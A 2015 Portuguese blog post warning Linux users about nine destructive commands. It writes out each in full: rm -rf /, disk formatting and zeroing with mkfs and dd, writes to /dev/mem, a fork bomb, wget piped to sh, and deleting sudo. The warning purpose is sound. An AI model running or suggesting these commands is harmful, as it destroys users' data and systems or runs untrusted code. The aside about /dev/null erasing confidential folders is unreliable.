segunda-feira, 3 de agosto de 2015

Linux - 9 comandos fatais

Este artigo foi criado com base no artigo de Joel Lee entitulado "9 Lethal Linux Commands You Should Never Run" e por achá-lo importante resolvi adaptá-lo aqui. Não espere uma tradução literal.


Muitos usuários Linux utilizam o terminal, e o sistema supõe que todos esses usuários são extremamente inteligentes e sabem exatamente o que estão fazendo, mas são todos humanos e acredito que a característica principal da humanidade é incorrer em erros. Esses 9 comandos a seguir nunca devem ser tentados por nenhum usuário do Linux, com o perigo de danificar irreparavelmente o sistema.

Exclusão Recursiva

Um dos parâmetros mais usados com o comando rm é o -rf, principalmente para se eliminar arquivos e pastas de maneira recursiva. Mas digitar o comando:
rm -rf /
Pode ser extremamente desastroso, dica: Nunca use o sudo para operar tal comando a menos que tenha a total certeza do que está fazendo.

Formatar seu HD

Sempre que for formatar um Pen Driver se corre o risco de digitar o comando:
mkfs.vfat /dev/hda
Pode parecer bobeira, mas já perdi um Pen Driver cheio de arquivos por digitar o endereço errado, imagina se tivesse sido o HD?

Reescrever o HD

É muito comum a geração de arquivo desviando a saída de algum comando com o > e, talvez por pressa, se resolva realizar esse processo diretamente em um Pen Drive e termine escrevendo o seguinte comando:
comando > /dev/hda
Não tenha pressa, primeiro gere o arquivo e depois mova-o para seu local de destino.

Limpando o HD

Este é mais um daqueles comandos que podem estragar completamente o HD. O que acontece é, literalmente, encher seu HD com Zeros:
dd if=/dev/zero of=/dev/hda/
Normalmente é um bom comando para ser usado em Pen Drive, além de fazer as coisas com calma use sempre o comando fdisk -l para saber aonde estão suas unidades.

Implodir o HD

Que tal conseguir anular completamente seu HD? Pois basta usar o comando:
mv / /dev/null
Este arquivo /dev/null é especial no Linux para as áreas de descarte do sistema, sendo extramente útil quando se deseja eliminar uma pasta confidencial.

Pânico no Kernel

Em Windows temos a famosa Tela Azul, já em Linux temos esses terríveis comandos:
dd if=/dev/random of=/dev/port
echo 1 > /proc/sys/kernel/panic
cat /dev/port
cat /dev/zero > /dev/mem
Basta digitar qualquer uma dessas linha para forçar uma reinicialização do sistema ou talvez algo pior.

Fork Bomb

Este termo, Fork Bomb (também chamado de Rabbit Virus ou Wabbit) é um ataque de negação de serviço em que um processo replica-se continuamente até esgotar todos recursos disponíveis no sistema, causando falta de recursos, retardamento ou deixar de funcionar.
Bash é a linguagem oficial do terminal e muito poderosa, e o seguinte comando no terminal:
:(){:|:&};:
Causa um Fork Bomb, então sempre que obter um Script que promete milagres, tente primeiro entender seu conteúdo antes de rodá-lo.

Executar um Script Remotamente

wget é um comando muito utilizado para retornar conteúdo da Web ou mesmo para acessar Sites, porém um simples combinação deste comando pode ser mortal:
wget http://uma-url-nao-confiavel -O- | sh
Essa combinação baixa um conteúdo qualquer da Web e o repassa ao comando sh para sua imediata execução. Se isso apontar para um Script malicioso pode dar adeus ao seu sistema.

Desabilitar os Privilegios do Root

Qualquer usuário Linux sabe que o usuário root é o Deus do Sistema e o utiliza indiscriminadamente, mas usar o comando:
rm -f /usr/bin/sudo;rm -f /bin/su
É uma forma muito estranha de brigar com Deus. Lembre-se que o root é seu amigo e só deve ser usado em ocasiões de extrema necessidade.

Esses 9 comandos não devem ser usados em nenhuma ocasião, como medida de segurança tenha sempre seus backups em dia. Quando abrir uma janela de terminal não tenha pressa e tenha a certeza de qual comando está digitando antes de apertar o Enter.

Obrigado e até a próxima
Fernando Anselmo 

0 comentários:

Postar um comentário